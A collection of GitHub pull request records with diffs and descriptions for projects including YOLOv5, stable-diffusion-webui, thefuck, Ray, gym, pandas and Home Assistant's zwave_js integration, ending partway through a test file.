Optimization of bounding box intersection-over-union calculations in YOLOv5.
### 📊 Key Changes
- 📐 Removed an epsilon (`eps`) addition in the width and height calculations of bounding boxes.
- 🔍 Adjusted the `v` term in the Complete Intersection over Union (CIoU) loss calculation to prevent division by zero during the aspect ratio term computation.
### 🎯 Purpose & Impact
- 🧹 The changes serve to clean up the intersection-over-union (IoU) computation, potentially leading to more accurate bounding box evaluations.
- 👨💻 For users and developers, these tweaks might result in slight performance enhancements during model training and evaluation, and more precise object detection metrics.
|
https://api.github.com/repos/ultralytics/yolov5/pulls/8546
|
2022-07-11T13:24:33Z
|
2022-07-11T14:07:12Z
|
2022-07-11T14:07:12Z
|
2024-01-19T08:42:13Z
| 620
|
ultralytics/yolov5
| 25,647
|
Add support for SD 2.1 Turbo
|
diff --git a/modules/sd_hijack.py b/modules/sd_hijack.py
index 0157e19f003..3d340fc9b21 100644
--- a/modules/sd_hijack.py
+++ b/modules/sd_hijack.py
@@ -38,9 +38,6 @@
optimizers = []
current_optimizer: sd_hijack_optimizations.SdOptimization = None
-ldm_original_forward = patches.patch(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
-sgm_original_forward = patches.patch(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
-
def list_optimizers():
new_optimizers = script_callbacks.list_optimizers_callback()
@@ -258,6 +255,9 @@ def flatten(el):
import modules.models.diffusion.ddpm_edit
+ ldm_original_forward = patches.patch(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
+ sgm_original_forward = patches.patch(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
+
if isinstance(m, ldm.models.diffusion.ddpm.LatentDiffusion):
sd_unet.original_forward = ldm_original_forward
elif isinstance(m, modules.models.diffusion.ddpm_edit.LatentDiffusion):
@@ -303,6 +303,9 @@ def undo_hijack(self, m):
self.layers = None
self.clip = None
+ patches.undo(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward")
+ patches.undo(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward")
+
sd_unet.original_forward = None
diff --git a/modules/sd_models.py b/modules/sd_models.py
index 841402e8629..9355f1e16b7 100644
--- a/modules/sd_models.py
+++ b/modules/sd_models.py
@@ -230,15 +230,19 @@ def select_checkpoint():
return checkpoint_info
-checkpoint_dict_replacements = {
+checkpoint_dict_replacements_sd1 = {
'cond_stage_model.transformer.embeddings.': 'cond_stage_model.transformer.text_model.embeddings.',
'cond_stage_model.transformer.encoder.': 'cond_stage_model.transformer.text_model.encoder.',
'cond_stage_model.transformer.final_layer_norm.': 'cond_stage_model.transformer.text_model.final_layer_norm.',
}
+checkpoint_dict_replacements_sd2_turbo = { # Converts SD 2.1 Turbo from SGM to LDM format.
+ 'conditioner.embedders.0.': 'cond_stage_model.',
+}
+
-def transform_checkpoint_dict_key(k):
- for text, replacement in checkpoint_dict_replacements.items():
+def transform_checkpoint_dict_key(k, replacements):
+ for text, replacement in replacements.items():
if k.startswith(text):
k = replacement + k[len(text):]
@@ -249,9 +253,14 @@ def get_state_dict_from_checkpoint(pl_sd):
pl_sd = pl_sd.pop("state_dict", pl_sd)
pl_sd.pop("state_dict", None)
+ is_sd2_turbo = 'conditioner.embedders.0.model.ln_final.weight' in pl_sd and pl_sd['conditioner.embedders.0.model.ln_final.weight'].size()[0] == 1024
+
sd = {}
for k, v in pl_sd.items():
- new_key = transform_checkpoint_dict_key(k)
+ if is_sd2_turbo:
+ new_key = transform_checkpoint_dict_key(k, checkpoint_dict_replacements_sd2_turbo)
+ else:
+ new_key = transform_checkpoint_dict_key(k, checkpoint_dict_replacements_sd1)
if new_key is not None:
sd[new_key] = v
|
## Description
This adds support for the newly released [Stable Diffusion 2.1 Turbo](https://huggingface.co/stabilityai/sd-turbo/blob/main/sd_turbo.safetensors) model, which is more lightweight than sdxl-turbo.
Until now, all SD1 and SD2 models have been released in the [LDM format](https://github.com/Stability-AI/stablediffusion), and all SDXL models have been released in [SGM format](https://github.com/Stability-AI/generative-models/tree/main/sgm). Because of that, there is a strong assumption all over the webui codebase that SGM format implies SDXL.
However, the SD 2.1 Turbo checkpoint was released in SGM format, breaking that assumption. Rather than rewrite the whole codebase to account for this possibility (possibly breaking extensions), I opted just to convert the checkpoint from SGM to LDM on load. (Which is as simple as renaming the dict keys from `conditioner.embedders.0.model.*` to `cond_stage_model.model.*`). By doing this, all features and extensions that were working with SD2, immediately work with SD2 Turbo as well.
This PR also fixes an existing issue where undo_hijack was only partially undoing the hijack, causing loading of SD2 models to fail (because is_using_v_parameterization_for_sd2 was not able to run).
## Screenshots/videos:

## Checklist:
- [X] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [X] I have performed a self-review of my own code
- [X] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [X] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/14170
|
2023-12-02T04:29:49Z
|
2023-12-02T06:30:07Z
|
2023-12-02T06:30:07Z
|
2024-01-07T02:23:45Z
| 871
|
AUTOMATIC1111/stable-diffusion-webui
| 39,894
|
Adding rule for forgotten '-r' when grepping folders
|
diff --git a/tests/rules/test_grep_recursive.py b/tests/rules/test_grep_recursive.py
new file mode 100644
index 000000000..0e3dae1d5
--- /dev/null
+++ b/tests/rules/test_grep_recursive.py
@@ -0,0 +1,12 @@
+from thefuck.rules.grep_recursive import match, get_new_command
+from tests.utils import Command
+
+
+def test_match():
+ assert match(Command('grep blah .', stderr='grep: .: Is a directory'), None)
+ assert not match(Command(), None)
+
+
+def test_get_new_command():
+ assert get_new_command(
+ Command('grep blah .'), None) == 'grep -r blah .'
diff --git a/thefuck/rules/grep_recursive.py b/thefuck/rules/grep_recursive.py
new file mode 100644
index 000000000..ed0b6fdb6
--- /dev/null
+++ b/thefuck/rules/grep_recursive.py
@@ -0,0 +1,7 @@
+def match(command, settings):
+ return (command.script.startswith('grep')
+ and 'is a directory' in command.stderr.lower())
+
+
+def get_new_command(command, settings):
+ return 'grep -r {}'.format(command.script[5:])
|
I guess it's straightforward to understand what it does :)
```
igor:~$ grep "is a directory" .
grep: .: Is a directory
igor:~$ fuck
grep -r "is a directory" .
dev/thefuck/tests/rules/test_rm_dir.py:7: Command('rm foo', stderr='rm: foo: is a directory'),
dev/thefuck/thefuck/rules/grep_recursive.py:3: and 'is a directory' in command.stderr.lower())
dev/thefuck/thefuck/rules/rm_dir.py:8: and 'is a directory' in command.stderr.lower())
```
|
https://api.github.com/repos/nvbn/thefuck/pulls/199
|
2015-05-15T22:28:51Z
|
2015-05-16T09:51:07Z
|
2015-05-16T09:51:07Z
|
2015-05-16T14:19:11Z
| 282
|
nvbn/thefuck
| 30,578
|
fix typo
|
diff --git a/fastchat/train/train_lora.py b/fastchat/train/train_lora.py
index 24c8b8978b..b2fa0a844c 100644
--- a/fastchat/train/train_lora.py
+++ b/fastchat/train/train_lora.py
@@ -41,7 +41,7 @@
@dataclass
class TrainingArguments(transformers.TrainingArguments):
- cache_dir: Optional[str] = field(default=None)
+ cache_dir: typing.Optional[str] = field(default=None)
optim: str = field(default="adamw_torch")
model_max_length: int = field(
default=512,
|
https://api.github.com/repos/lm-sys/FastChat/pulls/2031
|
2023-07-20T11:11:05Z
|
2023-07-20T17:02:36Z
|
2023-07-20T17:02:36Z
|
2023-07-20T17:02:36Z
| 140
|
lm-sys/FastChat
| 41,569
|
|
[workflow] Fix workflow recovery issue due to a bug of dynamic output
|
diff --git a/python/ray/workflow/tests/test_basic_workflows.py b/python/ray/workflow/tests/test_basic_workflows.py
index f5dc73f160e64..971c6f5724677 100644
--- a/python/ray/workflow/tests/test_basic_workflows.py
+++ b/python/ray/workflow/tests/test_basic_workflows.py
@@ -282,6 +282,29 @@ def f1(n):
assert isinstance(err, ValueError)
+def test_dynamic_output(workflow_start_regular_shared):
+ @workflow.step
+ def exponential_fail(k, n):
+ if n > 0:
+ if n < 3:
+ raise Exception("Failed intentionally")
+ return exponential_fail.options(name=f"step_{n}").step(
+ k * 2, n - 1)
+ return k
+
+ # When workflow fails, the dynamic output should points to the
+ # latest successful step.
+ try:
+ exponential_fail.options(name="step_0").step(
+ 3, 10).run(workflow_id="dynamic_output")
+ except Exception:
+ pass
+ from ray.workflow.workflow_storage import get_workflow_storage
+ wf_storage = get_workflow_storage(workflow_id="dynamic_output")
+ result = wf_storage.inspect_step("step_0")
+ assert result.output_step_id == "step_3"
+
+
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
diff --git a/python/ray/workflow/workflow_storage.py b/python/ray/workflow/workflow_storage.py
index b0df708e08cd1..b6a67292dee02 100644
--- a/python/ray/workflow/workflow_storage.py
+++ b/python/ray/workflow/workflow_storage.py
@@ -134,6 +134,7 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
outer_most_step_id: See WorkflowStepContext.
"""
tasks = []
+ dynamic_output_id = None
if isinstance(ret, Workflow):
# This workflow step returns a nested workflow.
assert step_id != ret.step_id
@@ -154,9 +155,6 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
# tasks.append(self._put(self._key_step_output(step_id), ret))
dynamic_output_id = step_id
# TODO (yic): Delete exception file
- tasks.append(
- self._update_dynamic_output(outer_most_step_id,
- dynamic_output_id))
else:
assert ret is None
promise = serialization.dump_to_storage(
@@ -166,8 +164,17 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
# tasks.append(
# self._put(self._key_step_exception(step_id), exception))
+ # Finish checkpointing.
asyncio_run(asyncio.gather(*tasks))
+ # NOTE: if we update the dynamic output before
+ # finishing checkpointing, then during recovery, the dynamic could
+ # would point to a checkpoint that does not exist.
+ if dynamic_output_id is not None:
+ asyncio_run(
+ self._update_dynamic_output(outer_most_step_id,
+ dynamic_output_id))
+
def load_step_func_body(self, step_id: StepID) -> Callable:
"""Load the function body of the workflow step.
|
<!-- Thank you for your contribution! Please review https://github.com/ray-project/ray/blob/master/CONTRIBUTING.rst before opening a pull request. -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
Workflow fails to recover to the latest checkpoint due to a bug of dynamic output in storage. For example,
Step A returns Step B, and Step B returns step C. When step C failed, the workflow recovers from step A instead of step B. This is not a bug of recovery algorithm, but a bug of dynamic output: the latest dynamic output of the workflow does not get
updated, so it points to the checkpoint of step A instead of step B.
## Related issue number
<!-- For example: "Closes #1234" -->
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
|
https://api.github.com/repos/ray-project/ray/pulls/21571
|
2022-01-13T07:22:00Z
|
2022-01-24T23:34:58Z
|
2022-01-24T23:34:58Z
|
2022-01-24T23:35:00Z
| 765
|
ray-project/ray
| 18,946
|
Fix: Allow `model_name` for `OpenAIEmbedding`
|
diff --git a/llama_index/embeddings/openai.py b/llama_index/embeddings/openai.py
index ac5e8d933d275..500fada6d08f7 100644
--- a/llama_index/embeddings/openai.py
+++ b/llama_index/embeddings/openai.py
@@ -282,6 +282,7 @@ def __init__(
if "model_name" in kwargs:
model_name = kwargs.pop("model_name")
+ self._query_engine = self._text_engine = model_name
else:
model_name = model
|
# Description
`OpenAILike` allows us to use non-OpenAI models with an OpenAI-like API, e.g., by calling:
```
llm = OpenAILike(
model="my-model",
)
```
There's no equivalent class for `OpenAIEmbedding`, but we could use `OpenAIEmbedding` and pass a different `model_name`, e.g.:
```
embed_model = OpenAIEmbedding(
model_name="paraphrase-multilingual-mpnet-base-v2"
)
```
There's already some code for passing `model_name`, which currently doesn't work - this PR fixes this.
## Type of Change
- Bug fix (non-breaking change which fixes an issue)
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- I stared at the code and made sure it makes sense
|
https://api.github.com/repos/run-llama/llama_index/pulls/9925
|
2024-01-09T06:50:50Z
|
2024-01-09T18:22:03Z
|
2024-01-09T18:22:03Z
|
2024-01-09T18:22:05Z
| 129
|
run-llama/llama_index
| 6,403
|
Clean up continuous mountain car environment
|
diff --git a/gym/envs/classic_control/continuous_mountain_car.py b/gym/envs/classic_control/continuous_mountain_car.py
index 8f34b268840..5ffc97685c1 100644
--- a/gym/envs/classic_control/continuous_mountain_car.py
+++ b/gym/envs/classic_control/continuous_mountain_car.py
@@ -22,13 +22,14 @@
from gym import spaces
from gym.utils import seeding
+
class Continuous_MountainCarEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': 30
}
- def __init__(self, goal_velocity = 0):
+ def __init__(self, goal_velocity=0):
self.min_action = -1.0
self.max_action = 1.0
self.min_position = -1.2
@@ -38,15 +39,26 @@ def __init__(self, goal_velocity = 0):
self.goal_velocity = goal_velocity
self.power = 0.0015
- self.low_state = np.array([self.min_position, -self.max_speed], dtype=np.float32)
- self.high_state = np.array([self.max_position, self.max_speed], dtype=np.float32)
+ self.low_state = np.array(
+ [self.min_position, -self.max_speed], dtype=np.float32
+ )
+ self.high_state = np.array(
+ [self.max_position, self.max_speed], dtype=np.float32
+ )
self.viewer = None
- self.action_space = spaces.Box(low=self.min_action, high=self.max_action,
- shape=(1,), dtype=np.float32)
- self.observation_space = spaces.Box(low=self.low_state, high=self.high_state,
- dtype=np.float32)
+ self.action_space = spaces.Box(
+ low=self.min_action,
+ high=self.max_action,
+ shape=(1,),
+ dtype=np.float32
+ )
+ self.observation_space = spaces.Box(
+ low=self.low_state,
+ high=self.high_state,
+ dtype=np.float32
+ )
self.seed()
self.reset()
@@ -61,20 +73,23 @@ def step(self, action):
velocity = self.state[1]
force = min(max(action[0], -1.0), 1.0)
- velocity += force*self.power -0.0025 * math.cos(3*position)
+ velocity += force * self.power - 0.0025 * math.cos(3 * position)
if (velocity > self.max_speed): velocity = self.max_speed
if (velocity < -self.max_speed): velocity = -self.max_speed
position += velocity
if (position > self.max_position): position = self.max_position
if (position < self.min_position): position = self.min_position
- if (position==self.min_position and velocity<0): velocity = 0
+ if (position == self.min_position and velocity < 0): velocity = 0
- done = bool(position >= self.goal_position and velocity >= self.goal_velocity)
+ # Convert a possible numpy bool to a Python bool.
+ done = bool(
+ position >= self.goal_position and velocity >= self.goal_velocity
+ )
reward = 0
if done:
reward = 100.0
- reward-= math.pow(action[0],2)*0.1
+ reward -= math.pow(action[0], 2) * 0.1
self.state = np.array([position, velocity])
return self.state, reward, done, {}
@@ -92,9 +107,8 @@ def render(self, mode='human'):
world_width = self.max_position - self.min_position
scale = screen_width/world_width
- carwidth=40
- carheight=20
-
+ carwidth = 40
+ carheight = 20
if self.viewer is None:
from gym.envs.classic_control import rendering
@@ -109,19 +123,23 @@ def render(self, mode='human'):
clearance = 10
- l,r,t,b = -carwidth/2, carwidth/2, carheight, 0
- car = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
+ l, r, t, b = -carwidth / 2, carwidth / 2, carheight, 0
+ car = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])
car.add_attr(rendering.Transform(translation=(0, clearance)))
self.cartrans = rendering.Transform()
car.add_attr(self.cartrans)
self.viewer.add_geom(car)
- frontwheel = rendering.make_circle(carheight/2.5)
+ frontwheel = rendering.make_circle(carheight / 2.5)
frontwheel.set_color(.5, .5, .5)
- frontwheel.add_attr(rendering.Transform(translation=(carwidth/4,clearance)))
+ frontwheel.add_attr(
+ rendering.Transform(translation=(carwidth / 4, clearance))
+ )
frontwheel.add_attr(self.cartrans)
self.viewer.add_geom(frontwheel)
- backwheel = rendering.make_circle(carheight/2.5)
- backwheel.add_attr(rendering.Transform(translation=(-carwidth/4,clearance)))
+ backwheel = rendering.make_circle(carheight / 2.5)
+ backwheel.add_attr(
+ rendering.Transform(translation=(-carwidth / 4, clearance))
+ )
backwheel.add_attr(self.cartrans)
backwheel.set_color(.5, .5, .5)
self.viewer.add_geom(backwheel)
@@ -130,15 +148,19 @@ def render(self, mode='human'):
flagy2 = flagy1 + 50
flagpole = rendering.Line((flagx, flagy1), (flagx, flagy2))
self.viewer.add_geom(flagpole)
- flag = rendering.FilledPolygon([(flagx, flagy2), (flagx, flagy2-10), (flagx+25, flagy2-5)])
- flag.set_color(.8,.8,0)
+ flag = rendering.FilledPolygon(
+ [(flagx, flagy2), (flagx, flagy2 - 10), (flagx + 25, flagy2 - 5)]
+ )
+ flag.set_color(.8, .8, 0)
self.viewer.add_geom(flag)
pos = self.state[0]
- self.cartrans.set_translation((pos-self.min_position)*scale, self._height(pos)*scale)
+ self.cartrans.set_translation(
+ (pos-self.min_position) * scale, self._height(pos) * scale
+ )
self.cartrans.set_rotation(math.cos(3 * pos))
- return self.viewer.render(return_rgb_array = mode=='rgb_array')
+ return self.viewer.render(return_rgb_array=mode == 'rgb_array')
def close(self):
if self.viewer:
|
Improve readability and mostly adhere to PEP-8.
I left the one-line ifs (l.77-81) as is.
|
https://api.github.com/repos/openai/gym/pulls/1867
|
2020-04-07T09:22:36Z
|
2020-04-10T22:25:02Z
|
2020-04-10T22:25:02Z
|
2020-04-10T22:25:02Z
| 1,573
|
openai/gym
| 5,783
|
BUG: read_csv with specified kwargs
|
diff --git a/doc/source/whatsnew/v0.23.2.txt b/doc/source/whatsnew/v0.23.2.txt
index 67c7ce150132a..0f2c9c4756987 100644
--- a/doc/source/whatsnew/v0.23.2.txt
+++ b/doc/source/whatsnew/v0.23.2.txt
@@ -64,6 +64,7 @@ Bug Fixes
**I/O**
+- Bug in :func:`read_csv` that caused it to incorrectly raise an error when ``nrows=0``, ``low_memory=True``, and ``index_col`` was not ``None`` (:issue:`21141`)
-
-
diff --git a/pandas/io/parsers.py b/pandas/io/parsers.py
index 2c8f98732c92f..65df2bffb4abf 100755
--- a/pandas/io/parsers.py
+++ b/pandas/io/parsers.py
@@ -3209,12 +3209,22 @@ def _get_empty_meta(columns, index_col, index_names, dtype=None):
col = columns[k] if is_integer(k) else k
dtype[col] = v
- if index_col is None or index_col is False:
+ # Even though we have no data, the "index" of the empty DataFrame
+ # could for example still be an empty MultiIndex. Thus, we need to
+ # check whether we have any index columns specified, via either:
+ #
+ # 1) index_col (column indices)
+ # 2) index_names (column names)
+ #
+ # Both must be non-null to ensure a successful construction. Otherwise,
+ # we have to create a generic emtpy Index.
+ if (index_col is None or index_col is False) or index_names is None:
index = Index([])
else:
data = [Series([], dtype=dtype[name]) for name in index_names]
index = _ensure_index_from_sequences(data, names=index_names)
index_col.sort()
+
for i, n in enumerate(index_col):
columns.pop(n - i)
diff --git a/pandas/tests/io/parser/common.py b/pandas/tests/io/parser/common.py
index 2b7ff1f5a9879..b39122e5e7906 100644
--- a/pandas/tests/io/parser/common.py
+++ b/pandas/tests/io/parser/common.py
@@ -238,6 +238,21 @@ def test_csv_mixed_type(self):
out = self.read_csv(StringIO(data))
tm.assert_frame_equal(out, expected)
+ def test_read_csv_low_memory_no_rows_with_index(self):
+ if self.engine == "c" and not self.low_memory:
+ pytest.skip("This is a low-memory specific test")
+
+ # see gh-21141
+ data = """A,B,C
+1,1,1,2
+2,2,3,4
+3,3,4,5
+"""
+ out = self.read_csv(StringIO(data), low_memory=True,
+ index_col=0, nrows=0)
+ expected = DataFrame(columns=["A", "B", "C"])
+ tm.assert_frame_equal(out, expected)
+
def test_read_csv_dataframe(self):
df = self.read_csv(self.csv1, index_col=0, parse_dates=True)
df2 = self.read_table(self.csv1, sep=',', index_col=0,
|
- [+] closes #21141
- [+] tests added / passed
- [+] passes `git diff upstream/master -u -- "*.py" | flake8 --diff`
- [ ] whatsnew entry
Solves the issue 21141.
|
https://api.github.com/repos/pandas-dev/pandas/pulls/21176
|
2018-05-22T20:36:04Z
|
2018-06-19T11:26:49Z
|
2018-06-19T11:26:49Z
|
2018-06-29T14:58:23Z
| 763
|
pandas-dev/pandas
| 45,223
|
Don't remove zwave_js devices automatically
|
diff --git a/homeassistant/components/zwave_js/__init__.py b/homeassistant/components/zwave_js/__init__.py
index ccadc452bc70d5..1321ef36f8506c 100644
--- a/homeassistant/components/zwave_js/__init__.py
+++ b/homeassistant/components/zwave_js/__init__.py
@@ -282,7 +282,8 @@ async def handle_logging_changed(_: Event | None = None) -> None:
for node in controller.nodes.values()
]
- # Devices that are in the device registry that are not known by the controller can be removed
+ # Devices that are in the device registry that are not known by the controller
+ # can be removed
for device in stored_devices:
if device not in known_devices:
self.dev_reg.async_remove_device(device.id)
@@ -509,25 +510,46 @@ def register_node_in_dev_reg(self, node: ZwaveNode) -> dr.DeviceEntry:
driver = self.driver_events.driver
device_id = get_device_id(driver, node)
device_id_ext = get_device_id_ext(driver, node)
- device = self.dev_reg.async_get_device(identifiers={device_id})
+ node_id_device = self.dev_reg.async_get_device(identifiers={device_id})
via_device_id = None
controller = driver.controller
# Get the controller node device ID if this node is not the controller
if controller.own_node and controller.own_node != node:
via_device_id = get_device_id(driver, controller.own_node)
- # Replace the device if it can be determined that this node is not the
- # same product as it was previously.
- if (
- device_id_ext
- and device
- and len(device.identifiers) == 2
- and device_id_ext not in device.identifiers
- ):
- self.remove_device(device)
- device = None
-
if device_id_ext:
+ # If there is a device with this node ID but with a different hardware
+ # signature, remove the node ID based identifier from it. The hardware
+ # signature can be different for one of two reasons: 1) in the ideal
+ # scenario, the node was replaced with a different node that's a different
+ # device entirely, or 2) the device erroneously advertised the wrong
+ # hardware identifiers (this is known to happen due to poor RF conditions).
+ # While we would like to remove the old device automatically for case 1, we
+ # have no way to distinguish between these reasons so we leave it up to the
+ # user to remove the old device manually.
+ if (
+ node_id_device
+ and len(node_id_device.identifiers) == 2
+ and device_id_ext not in node_id_device.identifiers
+ ):
+ new_identifiers = node_id_device.identifiers.copy()
+ new_identifiers.remove(device_id)
+ self.dev_reg.async_update_device(
+ node_id_device.id, new_identifiers=new_identifiers
+ )
+ # If there is an orphaned device that already exists with this hardware
+ # based identifier, add the node ID based identifier to the orphaned
+ # device.
+ if (
+ hardware_device := self.dev_reg.async_get_device(
+ identifiers={device_id_ext}
+ )
+ ) and len(hardware_device.identifiers) == 1:
+ new_identifiers = hardware_device.identifiers.copy()
+ new_identifiers.add(device_id)
+ self.dev_reg.async_update_device(
+ hardware_device.id, new_identifiers=new_identifiers
+ )
ids = {device_id, device_id_ext}
else:
ids = {device_id}
@@ -769,9 +791,12 @@ def async_on_notification(self, event: dict[str, Any]) -> None:
return
driver = self.controller_events.driver_events.driver
- notification: EntryControlNotification | NotificationNotification | PowerLevelNotification | MultilevelSwitchNotification = event[
- "notification"
- ]
+ notification: (
+ EntryControlNotification
+ | NotificationNotification
+ | PowerLevelNotification
+ | MultilevelSwitchNotification
+ ) = event["notification"]
device = self.dev_reg.async_get_device(
identifiers={get_device_id(driver, notification.node)}
)
@@ -984,6 +1009,39 @@ async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
LOGGER.error(err)
+async def async_remove_config_entry_device(
+ hass: HomeAssistant, config_entry: ConfigEntry, device_entry: dr.DeviceEntry
+) -> bool:
+ """Remove a config entry from a device."""
+ entry_hass_data = hass.data[DOMAIN][config_entry.entry_id]
+ client: ZwaveClient = entry_hass_data[DATA_CLIENT]
+
+ # Driver may not be ready yet so we can't allow users to remove a device since
+ # we need to check if the device is still known to the controller
+ if (driver := client.driver) is None:
+ LOGGER.error("Driver for %s is not ready", config_entry.title)
+ return False
+
+ # If a node is found on the controller that matches the hardware based identifier
+ # on the device, prevent the device from being removed.
+ if next(
+ (
+ node
+ for node in driver.controller.nodes.values()
+ if get_device_id_ext(driver, node) in device_entry.identifiers
+ ),
+ None,
+ ):
+ return False
+
+ controller_events: ControllerEvents = entry_hass_data[
+ DATA_DRIVER_EVENTS
+ ].controller_events
+ controller_events.registered_unique_ids.pop(device_entry.id, None)
+ controller_events.discovered_value_ids.pop(device_entry.id, None)
+ return True
+
+
async def async_ensure_addon_running(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Ensure that Z-Wave JS add-on is installed and running."""
addon_manager = _get_addon_manager(hass)
diff --git a/tests/components/zwave_js/test_init.py b/tests/components/zwave_js/test_init.py
index 75a7397cc4ed72..38de9f6dd17c9d 100644
--- a/tests/components/zwave_js/test_init.py
+++ b/tests/components/zwave_js/test_init.py
@@ -30,6 +30,7 @@
from .common import AIR_TEMPERATURE_SENSOR, EATON_RF9640_ENTITY
from tests.common import MockConfigEntry, async_get_persistent_notifications
+from tests.typing import WebSocketGenerator
@pytest.fixture(name="connect_timeout")
@@ -1016,6 +1017,7 @@ async def test_node_removed(
client.driver.controller.receive_event(Event("node added", event))
await hass.async_block_till_done()
old_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert old_device
assert old_device.id
event = {"node": node, "reason": 0}
@@ -1139,6 +1141,7 @@ async def test_replace_different_node(
hank_binary_switch_state,
client,
integration,
+ hass_ws_client: WebSocketGenerator,
) -> None:
"""Test when a node is replaced with a different node."""
dev_reg = dr.async_get(hass)
@@ -1147,11 +1150,11 @@ async def test_replace_different_node(
state["nodeId"] = node_id
device_id = f"{client.driver.controller.home_id}-{node_id}"
- multisensor_6_device_id = (
+ multisensor_6_device_id_ext = (
f"{device_id}-{multisensor_6.manufacturer_id}:"
f"{multisensor_6.product_type}:{multisensor_6.product_id}"
)
- hank_device_id = (
+ hank_device_id_ext = (
f"{device_id}-{state['manufacturerId']}:"
f"{state['productType']}:"
f"{state['productId']}"
@@ -1160,7 +1163,7 @@ async def test_replace_different_node(
device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
assert device
assert device == dev_reg.async_get_device(
- identifiers={(DOMAIN, multisensor_6_device_id)}
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
)
assert device.manufacturer == "AEON Labs"
assert device.model == "ZW100"
@@ -1168,8 +1171,7 @@ async def test_replace_different_node(
assert hass.states.get(AIR_TEMPERATURE_SENSOR)
- # A replace node event has the extra field "replaced" set to True
- # to distinguish it from an exclusion
+ # Remove existing node
event = Event(
type="node removed",
data={
@@ -1183,8 +1185,11 @@ async def test_replace_different_node(
await hass.async_block_till_done()
# Device should still be there after the node was removed
- device = dev_reg.async_get(dev_id)
+ device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
assert device
+ assert len(device.identifiers) == 2
# When the node is replaced, a non-ready node added event is emitted
event = Event(
@@ -1238,18 +1243,164 @@ async def test_replace_different_node(
client.driver.receive_event(event)
await hass.async_block_till_done()
- # Old device and entities were removed, but the ID is re-used
- device = dev_reg.async_get(dev_id)
- assert device
- assert device == dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
- assert device == dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id)})
- assert not dev_reg.async_get_device(identifiers={(DOMAIN, multisensor_6_device_id)})
- assert device.manufacturer == "HANK Electronics Ltd."
- assert device.model == "HKZW-SO01"
+ # node ID based device identifier should be moved from the old multisensor device
+ # to the new hank device and both the old and new devices should exist.
+ new_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert new_device
+ hank_device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert hank_device
+ assert hank_device == new_device
+ assert hank_device.identifiers == {
+ (DOMAIN, device_id),
+ (DOMAIN, hank_device_id_ext),
+ }
+ multisensor_6_device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
+ assert multisensor_6_device
+ assert multisensor_6_device != new_device
+ assert multisensor_6_device.identifiers == {(DOMAIN, multisensor_6_device_id_ext)}
+
+ assert new_device.manufacturer == "HANK Electronics Ltd."
+ assert new_device.model == "HKZW-SO01"
- assert not hass.states.get(AIR_TEMPERATURE_SENSOR)
+ # We keep the old entities in case there are customizations that a user wants to
+ # keep. They can always delete the device and that will remove the entities as well.
+ assert hass.states.get(AIR_TEMPERATURE_SENSOR)
assert hass.states.get("switch.smart_plug_with_two_usb_ports")
+ # Try to add back the first node to see if the device IDs are correct
+
+ # Remove existing node
+ event = Event(
+ type="node removed",
+ data={
+ "source": "controller",
+ "event": "node removed",
+ "reason": 3,
+ "node": state,
+ },
+ )
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ # Device should still be there after the node was removed
+ device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert device
+ assert len(device.identifiers) == 2
+
+ # When the node is replaced, a non-ready node added event is emitted
+ event = Event(
+ type="node added",
+ data={
+ "source": "controller",
+ "event": "node added",
+ "node": {
+ "nodeId": multisensor_6.node_id,
+ "index": 0,
+ "status": 4,
+ "ready": False,
+ "isSecure": False,
+ "interviewAttempts": 1,
+ "endpoints": [
+ {"nodeId": multisensor_6.node_id, "index": 0, "deviceClass": None}
+ ],
+ "values": [],
+ "deviceClass": None,
+ "commandClasses": [],
+ "interviewStage": "None",
+ "statistics": {
+ "commandsTX": 0,
+ "commandsRX": 0,
+ "commandsDroppedRX": 0,
+ "commandsDroppedTX": 0,
+ "timeoutResponse": 0,
+ },
+ "isControllerNode": False,
+ },
+ "result": {},
+ },
+ )
+
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ # Mark node as ready
+ event = Event(
+ type="ready",
